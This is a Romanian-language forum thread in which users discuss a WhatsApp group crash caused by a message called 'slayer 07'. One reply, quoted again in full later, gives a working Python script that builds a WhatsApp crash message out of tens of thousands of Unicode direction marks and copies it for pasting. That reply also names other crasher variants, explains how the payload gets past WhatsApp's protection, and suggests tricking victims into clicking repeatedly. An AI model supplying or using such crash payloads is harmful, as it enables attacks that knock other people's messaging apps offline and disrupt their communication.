Jump to content
TecHHH

Intrebare whatsapp

Recommended Posts

Posted

Am un grup de whatsapp si intrase un tip care a trimis o arhiva si de fiecare data cand incercam sa intru pe grup imi dadea whatsapp-ul crash, a trebuit sa intru pe whatsapp web si acolo nu aparea arhiva nici nimic, am sters tipul din grup si a trebuit sa sterg mesajele lui ca sa pot intra pe grup ca tot imi dadea crash. Desigur ceilalti membri din grup au patit la fel am facut spam si au putut sa intre oarecum cativa inapoi.

 

Cineva stie ceva sau despre ce e vorba?

Posted

Interesanta intamplarea, despre ce tip era vorba? Roman?

Daca crashuieste ceva e un bug si uneori astfel de bug-uri pot fi exploatabile (desi sanse foarte mici).

Daca faci rost de acel fisier sa ni-l dai si noua pe el. Nu ca as incepe sa ma uit eu pe el, dar il pot da unor persoane care au prezentat lucruri pe subiect la conferinte mari. 

Posted
On 6/14/2021 at 4:10 PM, Nytro said:

Interesanta intamplarea, despre ce tip era vorba? Roman?

Daca crashuieste ceva e un bug si uneori astfel de bug-uri pot fi exploatabile (desi sanse foarte mici).

Daca faci rost de acel fisier sa ni-l dai si noua pe el. Nu ca as incepe sa ma uit eu pe el, dar il pot da unor persoane care au prezentat lucruri pe subiect la conferinte mari. 

Am facut un research mai mare, nu este o arhiva este un cod binar pe care nu il pot vedea pe whatsapp web , si cu telefonu cum ai apasat sa intri pe chat da crash. 

Numele la codul ala binar este slayer 07, in rest n am idee de cum se foloseste probabil ai nevoie de ceva whatsapp modat. Ceea ce stiu este ca daca dai codul acela binar pe un grup de whatsapp cine vrea sa intre ia crash, ca sa remediezi asta trebuie sa intri pe whatsapp web si sa stergi mesajele lui cu " This message cannot be seen on whatsapp web. You can see it on the phone. " Dupa dispare si de pe telefon si poti intra inapoi :)). Si da tipul era roman desigur :))

Posted
On 6/14/2021 at 4:10 PM, Nytro said:

Interesanta intamplarea, despre ce tip era vorba? Roman?

Daca crashuieste ceva e un bug si uneori astfel de bug-uri pot fi exploatabile (desi sanse foarte mici).

Daca faci rost de acel fisier sa ni-l dai si noua pe el. Nu ca as incepe sa ma uit eu pe el, dar il pot da unor persoane care au prezentat lucruri pe subiect la conferinte mari. 

Dupa slayer 07 gasesti mizerii de genu'

https://www.youtube.com/watch?v=s8pWeY87cy0

 

din care ar iesi ca e ceva bug din emoji!?

Am cautat 2 minute si nu gasesc niste surse mai ok.

Posted

Poate sunt persoane care utilizeaza versiuni mai vechi si dau click de mai multe ori pe elemente ce induc bufferoverflow in memorie ca in exemplul de mai jos.

Exista totusi si versiuni noi care trec de protectia 'unicode' a whatsapp-ului ele se numesc:

-"Binario", "Contact bombs", "Trava Zap", "Crashers" , "message/vcard crash"

O versiune python care merge pe androidurile si ios mai vechi :) :

mai intai instalati cu pip pyperclip

pip install pyperclip

dupa care scrieti codul in notepad:

import pyperclip
ltr = u'\u200E'
rtl = u'\u200F'
ltr_rtl = ltr + rtl
bombmess = (ltr_rtl * 20000)
#print(bombmess) #not recommended on 
crazy = u'\u2067'
pyperclip.copy(crazy + bombmess)
spam = pyperclip.paste()

dupa care salvati in fisier cu extensia .py si rulati in cmd/terminal fisier.py simplu.

textul de trimis pe whatsapp web se copie automat pe clipboard si trebuie doar sa dai paste in whatsapp...

Cum functioneaza?

Foloseste ~120k combinatii de caractere unicode compresate intr-un singur cod ca sa treaca de limita de caractere a protectiei whatsapp

Fiecare se poate juca si gasi combinatii noi folosind prima coloana de aici

pyperclip este doar pentru copy paste

200E si 200F sunt pentru left to right mark si right to left mark. 2067 este caracterul de compresie, fara acest caracter este posibil ca elemntele sa nu fie incarcate in memorie deorece este posibil ca whatsapp sa creada ca a primit un mesaj gol.

Se pot adauga elemente care sa determine utilizatorul sa execute click de mai multe ori etc...

 

  • Like 1
  • Upvote 3
Posted
On 6/17/2021 at 4:10 AM, andr82 said:

Poate sunt persoane care utilizeaza versiuni mai vechi si dau click de mai multe ori pe elemente ce induc bufferoverflow in memorie ca in exemplul de mai jos.

Exista totusi si versiuni noi care trec de protectia 'unicode' a whatsapp-ului ele se numesc:

-"Binario", "Contact bombs", "Trava Zap", "Crashers" , "message/vcard crash"

O versiune python care merge pe androidurile si ios mai vechi :) :

mai intai instalati cu pip pyperclip

pip install pyperclip

dupa care scrieti codul in notepad:


import pyperclip
ltr = u'\u200E'
rtl = u'\u200F'
ltr_rtl = ltr + rtl
bombmess = (ltr_rtl * 20000)
#print(bombmess) #not recommended on 
crazy = u'\u2067'
pyperclip.copy(crazy + bombmess)
spam = pyperclip.paste()

dupa care salvati in fisier cu extensia .py si rulati in cmd/terminal fisier.py simplu.

textul de trimis pe whatsapp web se copie automat pe clipboard si trebuie doar sa dai paste in whatsapp...

Cum functioneaza?

Foloseste ~120k combinatii de caractere unicode compresate intr-un singur cod ca sa treaca de limita de caractere a protectiei whatsapp

Fiecare se poate juca si gasi combinatii noi folosind prima coloana de aici

pyperclip este doar pentru copy paste

200E si 200F sunt pentru left to right mark si right to left mark. 2067 este caracterul de compresie, fara acest caracter este posibil ca elemntele sa nu fie incarcate in memorie deorece este posibil ca whatsapp sa creada ca a primit un mesaj gol.

Se pot adauga elemente care sa determine utilizatorul sa execute click de mai multe ori etc...

 

Faza este ca la tipul ala se intampla ceva ciudat nici macar nu trebuia sa dai citeste mai mult se bloca direct la toata lumea si dadea crash, dadeai click sa intri pe chat si nu intra direct lua crash wapp-ul, dupa am facut spam pe grup si cand am dat sa intru a mers ca nu se mai vedea slayer 07 ala, am incercat sa dau in sus sa il vad nici macar nu ajunge sa se vada ca deja lua crash wapp-ul :))

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...